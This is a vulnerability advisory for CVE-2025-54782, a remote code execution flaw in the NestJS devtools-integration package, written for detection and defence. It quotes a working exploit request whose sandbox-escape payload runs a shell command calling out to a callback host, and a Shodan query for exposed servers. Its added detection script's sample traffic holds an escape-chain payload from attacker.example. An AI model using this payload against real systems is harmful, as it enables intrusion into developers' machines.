CVE-2025-54782
published 2025-08-02

Priority: P1 · 88 · high · CVSS 3.1: 8.8
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 46.17% (98.7th percentile)
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.

Affected

3 ranges
Vendor   Product               Version range   Fixed in
nestjs   devtools-integration  < 0.2.1         0.2.1
nestjs   devtools-integration  >= 0 < 0.2.1    0.2.1
nestjs   nest                  < 0.2.1         0.2.1

Detection & IOCs (extracted from sources)

URL: /inspector/graph/interact
Command: POST /inspector/graph/interact HTTP/1.1 Host: {{Hostname}} Content-Type: text/plain {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
Other: shodan-query: "devtools.nestjs.com"
  • Monitor for POST requests to /inspector/graph/interact on locally running NestJS development servers; the endpoint accepts a JSON body with a 'code' field for arbitrary execution.
  • Detect sandbox escape pattern using propertyIsEnumerable.call() to obtain constructor chain and reach process.mainModule.require('child_process') within the vm.runInNewContext sandbox.
  • Requests to /inspector/graph/interact with Content-Type: text/plain returning HTTP 200 and application/plain content-type in response are indicative of successful exploitation.
  • Use Shodan query 'devtools.nestjs.com' to identify internet-exposed NestJS DevTools integration servers vulnerable to this RCE.
  • The vulnerability is present in @nestjs/devtools-integration versions 0.2.0 and below; flag any deployment of these versions with the devtools integration enabled.
  • The vulnerable endpoint is only exposed when the @nestjs/devtools-integration package is explicitly enabled in a NestJS application, typically only in local development environments — not in production by default.
  • Exploitation can be triggered cross-origin (CSRF-style) by any malicious website visited by the developer, due to missing cross-origin protections — no direct network access to the developer machine is required.
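The detection bullets above name the indicators (POST to /inspector/graph/interact, a JSON body with a `code` field, the constructor-chain escape markers, and a cross-origin request against a local dev server). The following Node.js script turns them into a classifier over captured request records. It is an added example, not code from the advisory, from cbcvebase, or from the NestJS project; the request-record shape (method, path, headers, body) and the sample requests are constructed for this demonstration.

```javascript
// Added example (not from the advisory or from NestJS): classify captured HTTP
// request records for CVE-2025-54782 indicators. The record shape
// {method, path, headers, body} is an assumption of this example.

const VULN_PATH = '/inspector/graph/interact';

// Substrings the advisory names as the escape chain used inside the
// vm.runInNewContext sandbox. Matching them is a heuristic, not proof.
const ESCAPE_MARKERS = [
  'propertyIsEnumerable.call',
  'constructor.constructor',
  'mainModule.require',
  'child_process',
];

// The endpoint takes a JSON body with a `code` field; tolerate non-JSON bodies.
function parseCodeField(body) {
  try {
    const parsed = JSON.parse(body);
    return parsed && typeof parsed.code === 'string' ? parsed.code : null;
  } catch (_) {
    return null;
  }
}

// A dev server should only be driven from the developer's own machine;
// anything else in the Origin header is the CSRF-style pattern the advisory describes.
function isLoopbackOrigin(origin) {
  try {
    const host = new URL(origin).hostname;
    return ['localhost', '127.0.0.1', '[::1]', '::1'].includes(host);
  } catch (_) {
    return false;
  }
}

// Returns a list of finding tags for one request; empty when nothing matches.
function classifyRequest(req) {
  const findings = [];
  if (req.path !== VULN_PATH) return findings;
  if ((req.method || '').toUpperCase() === 'POST') findings.push('post-to-interact-endpoint');
  const code = parseCodeField(req.body || '');
  if (code !== null) {
    findings.push('code-field-present');
    const hits = ESCAPE_MARKERS.filter((m) => code.includes(m));
    if (hits.length) findings.push(`sandbox-escape-markers:${hits.join(',')}`);
  }
  const origin = (req.headers || {}).origin;
  if (origin && !isLoopbackOrigin(origin)) findings.push(`cross-origin:${origin}`);
  return findings;
}

// Escape markers, or code arriving cross-origin, are treated as likely exploitation.
function severity(findings) {
  if (findings.some((f) => f.startsWith('sandbox-escape-markers:'))) return 'high';
  if (findings.includes('code-field-present') && findings.some((f) => f.startsWith('cross-origin:'))) return 'high';
  if (findings.includes('code-field-present')) return 'medium';
  return findings.length ? 'low' : 'none';
}

// Returns only the requests that produced findings, with their index preserved.
function scan(requests) {
  return requests
    .map((r, i) => ({ index: i, findings: classifyRequest(r) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample traffic for this example (not real captures).
const SAMPLE_REQUESTS = [
  { // same-origin POST with a benign code field: worth logging, not alarming
    method: 'POST', path: VULN_PATH,
    headers: { origin: 'http://localhost:3000', 'content-type': 'application/json' },
    body: '{"code":"1 + 1"}' },
  { // cross-origin POST carrying the escape-chain markers named in the advisory
    method: 'POST', path: VULN_PATH,
    headers: { origin: 'https://attacker.example', 'content-type': 'text/plain' },
    body: '{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor(\'return process\')().mainModule.require(\'child_process\')}})()"}' },
  { method: 'GET', path: '/inspector/graph', headers: {}, body: '' },
];

for (const hit of scan(SAMPLE_REQUESTS)) {
  console.log(`request #${hit.index}: ${severity(hit.findings)} -> ${hit.findings.join(' | ')}`);
}
```

Feed `scan()` with records parsed from a proxy or WAF export; the tags are meant to be stable strings a SIEM rule can key on, and the origin check is the piece that separates the developer's own devtools UI from the cross-origin trigger the advisory describes.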

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      8.8     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd         v4.0      9.4     CRITICAL   CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck             9.4     CRITICAL